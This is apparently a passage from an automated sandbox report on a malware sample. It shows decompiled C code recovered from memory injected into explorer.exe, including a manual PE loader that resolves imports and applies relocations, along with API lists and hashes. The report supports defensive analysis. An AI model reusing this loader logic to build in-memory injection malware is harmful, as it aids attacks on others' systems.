                  									_v88 =  *_v20 + _a4;
                  									_v60 = GetProcAddress(_v36, _v88 + 2);
                  								} else {
                  									_v60 = GetProcAddress(_v36,  *_v20 & 0x0000ffff);
                  								}
                  								if( *((intOrPtr*)(_v16 + 0x10)) == 0) {
                  									 *_v20 = _v60;
                  								} else {
                  									 *( *((intOrPtr*)(_v16 + 0x10)) + _a4 + _v64) = _v60;
                  								}
                  								_v20 =  &(_v20[1]);
                  								_v64 = _v64 + 4;
                  							}
                  							_v16 = _v16 + 0x14;
                  							continue;
                  						} else {
                  							_t189 = 0xfffffffd;
                  							return _t189;
                  						}
                  					}
                  					goto L35;
                  				}
                  				_t194 = 8;
                  				_v44 = _a4 +  *((intOrPtr*)(_v24 + 0x78 + _t194 * 5));
                  				_t196 = 8;
                  				_v48 =  *((intOrPtr*)(_v24 + 0x7c + _t196 * 5));
                  				while(0 != 0) {
                  				}
                  				while(_v48 > 0) {
                  					_v28 = _v44[2];
                  					_v48 = _v48 - _v28;
                  					_v28 = _v28 - 8;
                  					_v28 = _v28 >> 1;
                  					_v32 =  &(_v44[4]);
                  					_v80 = _a4 +  *_v44;
                  					_v52 = _v28;
                  					while(1) {
                  						_v76 = _v52;
                  						_v52 = _v52 - 1;
                  						if(_v76 == 0) {
                  							break;
                  						}
                  						_v5 = ( *_v32 & 0x0000ffff) >> 0xc;
                  						_v12 =  *_v32 & 0xfff;
                  						_v40 = (_v12 & 0x0000ffff) + _v80;
                  						if((_v5 & 0x000000ff) != 3) {
                  							if((_v5 & 0x000000ff) == 0xa) {
                  								 *_v40 =  *_v40 + _v56;
                  							}
                  						} else {
                  							 *_v40 =  *_v40 + _v56;
                  						}
                  						_v32 =  &(_v32[1]);
                  					}
                  					_v44 = _v32;
                  				}
                  				goto L13;
                  			}

                  APIs
                  • GetModuleHandleA.KERNEL32(?), ref: 00092C4C
                  • LoadLibraryA.KERNEL32(?), ref: 00092C65
                  • GetProcAddress.KERNEL32(00000000,890CC483), ref: 00092CC1
                  • GetProcAddress.KERNEL32(00000000,?), ref: 00092CE0
                  Memory Dump Source
                  • Source File: 00000011.00000002.869763574.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
                  Similarity
                  • API ID: AddressProc$HandleLibraryLoadModule
                  • String ID:
                  • API String ID: 384173800-0
                  • Opcode ID: 8b0f860062b7566b354e1c94a9238a23d10e63c9254979b45f4c1e3852145292
                  • Instruction ID: f71a99207cef5de23c8ddc2f8d773f6edabddc3cd5bada4ad458651b88394428
                  • Opcode Fuzzy Hash: 8b0f860062b7566b354e1c94a9238a23d10e63c9254979b45f4c1e3852145292
                  • Instruction Fuzzy Hash: E4A17AB5A01209EFCF54CFA8C885AADBBF1FF08314F148459E815AB351D734AA81DF64
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 75%
                  			E00081C68(signed int __ecx, void* __eflags, void* __fp0) {
                  				char _v16;
                  				intOrPtr _v20;
                  				char _v24;
                  				char _v28;
                  				void* _t13;
                  				intOrPtr _t15;
                  				signed int _t16;
                  				intOrPtr _t17;
                  				signed int _t18;
                  				char _t20;
                  				intOrPtr _t22;
                  				void* _t23;
                  				void* _t24;
                  				intOrPtr _t29;
                  				intOrPtr _t35;
                  				intOrPtr _t41;
                  				intOrPtr _t43;
                  				intOrPtr _t48;
                  				void* _t51;
                  				signed int _t61;
                  				signed int _t64;
                  				void* _t71;
                  
                  				_t71 = __fp0;
                  				_t61 = __ecx;
                  				_t41 =  *0x9e6dc; // 0x1e4
                  				_t13 = E0008A4BF(_t41, 0);
                  				while(_t13 < 0) {
                  					E0008980C( &_v28);
                  					_t43 =  *0x9e6e0; // 0x0
                  					_t15 =  *0x9e6e4; // 0x0
                  					_t41 = _t43 + 0xe10;
                  					asm("adc eax, ebx");
                  					__eflags = _t15 - _v24;
                  					if(__eflags > 0) {
                  						L9:
                  						_t16 = 0xfffffffe;
                  						L13:
                  						return _t16;
                  					}
                  					if(__eflags < 0) {
                  						L4:
                  						_t17 =  *0x9e684; // 0x40f8f0
                  						_t18 =  *((intOrPtr*)(_t17 + 0xc8))( *0x9e6d0, 0);
                  						__eflags = _t18;
                  						if(_t18 == 0) {
                  							break;
                  						}
                  						_t35 =  *0x9e684; // 0x40f8f0
                  						 *((intOrPtr*)(_t35 + 0xb4))(0x3e8);
                  						_t41 =  *0x9e6dc; // 0x1e4
                  						__eflags = 0;
                  						_t13 = E0008A4BF(_t41, 0);
                  						continue;
                  					}
                  					__eflags = _t41 - _v28;
                  					if(_t41 >= _v28) {
                  						goto L9;
                  					}
                  					goto L4;
                  				}
                  				asm("stosd");
                  				asm("stosd");
                  				asm("stosd");
                  				asm("stosd");
                  				_t20 =  *0x9e6e8; // 0x40fd78
                  				_v28 = _t20;
                  				_t22 = E0008A6A9(_t41, _t61,  &_v16);
                  				_v20 = _t22;
                  				if(_t22 != 0) {
                  					_t23 = GetCurrentProcess();
                  					_t24 = GetCurrentThread();
                  					DuplicateHandle(GetCurrentProcess(), _t24, _t23, 0x9e6d0, 0, 0, 2);
                  					E0008980C(0x9e6e0);
                  					_t64 = E00081A1B( &_v28, E00081226, _t71);
                  					__eflags = _t64;
                  					if(_t64 >= 0) {
                  						_push(0);
                  						_push( *0x9e760);
                  						_t51 = 0x27;
                  						E00089F06(_t51);
                  					}
                  				} else {
                  					_t64 = _t61 | 0xffffffff;
                  				}
                  				_t29 =  *0x9e684; // 0x40f8f0
                  				 *((intOrPtr*)(_t29 + 0x30))( *0x9e6d0);
                  				_t48 =  *0x9e6dc; // 0x1e4
                  				 *0x9e6d0 = 0;
                  				E0008A4DB(_t48);
                  				E0008861A( &_v24, 0);
                  				_t16 = _t64;
                  				goto L13;
                  			}

                  Memory Dump Source
                  • Source File: 00000011.00000002.869763574.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 7af54bf47eeafca49fec7a466d95b770275a6c99f1a555b29a304e1941eb5a54
                  • Instruction ID: b7eecfca9752b51bd3878614f3e3ca223f58aa9d07610ca166e7e1ee13e62024
                  • Opcode Fuzzy Hash: 7af54bf47eeafca49fec7a466d95b770275a6c99f1a555b29a304e1941eb5a54
                  • Instruction Fuzzy Hash: A431C232604340AFE754FFA4EC859AA77ADFB943A0F54092BF581C32E2DE389C058756
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 73%
                  			E00081B2D(void* __eflags, void* __fp0) {
                  				char _v24;
                  				char _v28;
                  				void* _t12;
                  				intOrPtr _t14;
                  				void* _t15;
                  				intOrPtr _t16;
                  				void* _t17;
                  				void* _t19;
                  				void* _t20;
                  				char _t24;
                  				intOrPtr _t26;
                  				intOrPtr _t28;
                  				intOrPtr _t33;
                  				intOrPtr _t38;
                  				intOrPtr _t40;
                  				void* _t41;
                  				intOrPtr _t46;
                  				void* _t48;
                  				intOrPtr _t51;
                  				void* _t61;
                  				void* _t71;
                  
                  				_t71 = __fp0;
                  				_t38 =  *0x9e6f4; // 0x1e0
                  				_t12 = E0008A4BF(_t38, 0);
                  				while(_t12 < 0) {
                  					E0008980C( &_v28);
                  					_t40 =  *0x9e700; // 0x0
                  					_t14 =  *0x9e704; // 0x0
                  					_t41 = _t40 + 0x3840;
                  					asm("adc eax, ebx");
                  					__eflags = _t14 - _v24;
                  					if(__eflags > 0) {
                  						L13:
                  						_t15 = 0;
                  					} else {
                  						if(__eflags < 0) {
                  							L4:
                  							_t16 =  *0x9e684; // 0x40f8f0
                  							_t17 =  *((intOrPtr*)(_t16 + 0xc8))( *0x9e6ec, 0);
                  							__eflags = _t17;
                  							if(_t17 == 0) {
                  								break;
                  							} else {
                  								_t33 =  *0x9e684; // 0x40f8f0
                  								 *((intOrPtr*)(_t33 + 0xb4))(0x1388);
                  								_t51 =  *0x9e6f4; // 0x1e0
                  								__eflags = 0;
                  								_t12 = E0008A4BF(_t51, 0);
                  								continue;
                  							}
                  						} else {
                  							__eflags = _t41 - _v28;
                  							if(_t41 >= _v28) {
                  								goto L13;
                  							} else {
                  								goto L4;
                  							}
                  						}
                  					}
                  					L12:
                  					return _t15;
                  				}
                  				E0008980C(0x9e700);
                  				_t19 = GetCurrentProcess();
                  				_t20 = GetCurrentThread();
                  				DuplicateHandle(GetCurrentProcess(), _t20, _t19, 0x9e6ec, 0, 0, 2);
                  				asm("stosd");
                  				asm("stosd");
                  				asm("stosd");
                  				asm("stosd");
                  				_t24 =  *0x9e6e8; // 0x40fd78
                  				_v28 = _t24;
                  				_t61 = E00081A1B( &_v28, E0008131E, _t71);
                  				if(_t61 >= 0) {
                  					_push(0);
                  					_push( *0x9e760);
                  					_t48 = 0x27;
                  					E00089F06(_t48);
                  				}
                  				if(_v24 != 0) {
                  					E00086890( &_v24);
                  				}
                  				_t26 =  *0x9e684; // 0x40f8f0
                  				 *((intOrPtr*)(_t26 + 0x30))( *0x9e6ec);
                  				_t28 =  *0x9e758; // 0x0
                  				 *0x9e6ec = 0;
                  				_t29 =  !=  ? 1 : _t28;
                  				_t46 =  *0x9e6f4; // 0x1e0
                  				 *0x9e758 =  !=  ? 1 : _t28;
                  				E0008A4DB(_t46);
                  				_t15 = _t61;
                  				goto L12;
                  			}

                  APIs
                  • GetCurrentProcess.KERNEL32(0009E6EC,00000000,00000000,00000002), ref: 00081BCC
                  • GetCurrentThread.KERNEL32(00000000), ref: 00081BCF
                  • GetCurrentProcess.KERNEL32(00000000), ref: 00081BD6
                  • DuplicateHandle.KERNEL32 ref: 00081BD9
                  Memory Dump Source
                  • Source File: 00000011.00000002.869763574.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
                  Similarity
                  • API ID: Current$Process$DuplicateHandleThread
                  • String ID:
                  • API String ID: 3566409357-0
                  • Opcode ID: f5b9d26db10020dcd7cac68cf43cf7bf7c508de2d61b361089cb2e0ad45b02f1
                  • Instruction ID: c21506e0fc88ba440ea6bcc6b6f55abd04b465cff164c1f0cab10b664a380183
                  • Opcode Fuzzy Hash: f5b9d26db10020dcd7cac68cf43cf7bf7c508de2d61b361089cb2e0ad45b02f1
                  • Instruction Fuzzy Hash: F13184716043519FF704FFA4EC899AA77A9FF94390B04496EF681C72A2DB389C05CB52
                  Uniqueness

                  Uniqueness Score: -1.00%